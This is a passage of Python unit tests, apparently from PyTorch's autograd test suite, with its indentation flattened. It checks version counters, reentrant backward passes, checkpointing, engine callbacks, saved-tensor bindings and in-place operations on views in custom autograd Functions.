gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
# Test for all inputs and outputs being complex
y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
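# Assigning to `.data` should rebind the underlying tensor without creating a new Python object.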
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because this doesn't work on Windows")
def test_thread_shutdown(self):
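# Runs a small backward in a subprocess and checks the API-usage log for the autograd
# worker-thread shutdown event.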
code = """import torch
from torch.autograd import Function
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
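# Checkpointing recomputes `module`'s activations during backward instead of storing them for
# all 2000 inputs, keeping memory bounded.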
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
def test_checkpoint_valid_reset_on_error(self):
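# checkpoint() does not support torch.autograd.grad(); after that failure the internal
# checkpointing state must be reset so a later backward() still works.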
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
def test_callback_adds_callback(self):
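# A callback queued from within another execution-engine callback must still run during the
# same backward pass, so both increments happen before the final check.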
called = [0]
def callback_final():
called[0] += 1
def callback_adds_callback():
called[0] += 1
Variable._execution_engine.queue_callback(callback_final)
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, grad):
Variable._execution_engine.queue_callback(callback_adds_callback)
return grad
a = torch.rand((3, 3), requires_grad=True)
b = MyFunc.apply(a)
b.sum().backward()
self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
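# install_callbacks_in_depths selects the reentrant depth(s) at which a callback is queued:
# 0 for the outer backward, 1 for the nested one.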
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
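# The hook runs its own (reentrant) backward while param.grad is temporarily cleared; this must
# not deadlock, and the original grad is restored afterwards.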
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any of the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._raw_saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)
a = torch.ones(2, 2, requires_grad=True)
out = a * a
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10::optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10::optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10::optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
def getFn(save=True):
class MyFn(Function):
@staticmethod
def forward(ctx, x):
if save:
ctx.save_for_backward(x, None)
return x
@staticmethod
def backward(ctx, g):
return g
return MyFn
a = torch.randn(5, requires_grad=True)
y = getFn(True).apply(a)
self.assertEqual((a, None), y.grad_fn.saved_tensors)
saved = y.grad_fn._raw_saved_tensors
self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
# We can't tell whether the underlying tensor is None without unpacking it
self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)
# We catch that error when the user calls register_hooks on it
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
saved[1].register_hooks(lambda x: x, lambda x: x)
saved[0].register_hooks(lambda x: x, lambda x: x)
y.sum().backward()
# Using a reference to the SavedTensor object after the
# saved variables have been released can lead to undefined behavior
del saved
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn._raw_saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn.saved_tensors
y = getFn(False).apply(a)
self.assertEqual(y.grad_fn.saved_tensors, ())
self.assertEqual(y.grad_fn._raw_saved_tensors, ())
def test_autograd_views_codegen(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are inplace ops allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are inplace ops allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_on_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b inplace for gradcheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly
bw_called[0] = 0
ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_inplace_views_creation_meta(self):
# Tests creation_meta properly handled for inplace views
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.view_as(x)
@staticmethod
def backward(ctx, x):
return x
view_custom = Func.apply
def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
# This test checks the behavior of inplace-view functions when
# the views are created in grad mode or not
base = torch.rand(2, 3, requires_grad=requires_grad).clone()
# 1. Create a view with `grad_mode=grad_mode_view`
with torch.set_grad_enabled(grad_mode_view):
if fn_type == "multi_view":
inp = base.unbind()[0]
elif fn_type == "custom" :
inp = view_custom(base)
else:
inp = base.view_as(base)
# 2. Perform inplace view with `grad_mode=grad_mode_iview`
with torch.set_grad_enabled(grad_mode_iview):
if error1 is not None:
with self.assertRaisesRegex(RuntimeError, error1):
fn(inp)
return
else:
# If error is None, check that it runs without error
fn(inp)
# 3. Do inplace on the (new) view
if error2 is not None:
with self.assertRaisesRegex(RuntimeError, error2):
inp.add_(1)
else:
# If error is None, check that it runs without error
inp.add_(1)
no_grad_err = "A view was created in no_grad mode"
multi_view_err = "function that returns multiple views"
custom_err = "view was created inside a custom Function"
def run_tests(fn):
for fn_type in ("normal", "multi_view", "custom"):
for grad_mode_view in (True, False):
for grad_mode_iview in (True, False):
for requires_grad in (True, False):
error1 = None # expected error when we do inplace_view on original view
error2 = None # expected error when we do inplace on the resulting view
if requires_grad:
if not grad_mode_view and grad_mode_iview:
error1 = no_grad_err
if not grad_mode_view and not grad_mode_iview:
error2 = no_grad_err
if fn_type == "multi_view":
if grad_mode_view and grad_mode_iview:
error1 = multi_view_err
if grad_mode_view and not grad_mode_iview:
error2 = multi_view_err
if fn_type == "custom":
if grad_mode_view and grad_mode_iview:
error1 = custom_err
if grad_mode_view and not grad_mode_iview:
error2 = custom_err
run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
# This list was created by logging gen_inplace_or_view_type.py
# detach_ is excluded for this test because it cannot be applied to
# views and thus does not return a view
run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
run_tests(lambda v: v.transpose_(0, 0))
run_tests(lambda v: v.t_())
run_tests(lambda v: v.squeeze_(0))
run_tests(lambda v: v.unsqueeze_(0))
run_tests(lambda v: v.swapdims_(0, 0))
run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
# This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b = b.transpose(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
non_inplace_grad = a_orig.grad
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b.transpose_(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
inplace_grad = a_orig.grad
# TODO: this is a bug!
# once this is fixed, it should have the transpose removed:
# self.assertTrue(torch.allclose(non_inplace_grad, inplace_grad))
self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This checks that multiple views created in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
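# Intentionally create more than one view of `a` (narrow, then select); only the last view
# is returned, exercising multi-view tracking inside the custom Function.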
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_python_custom_function_inplace(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This test checks custom autograd.Functions that perform inplace operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
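# Grad mode observed inside the custom backward must match the engine's original state, both
# with and without create_graph.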
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
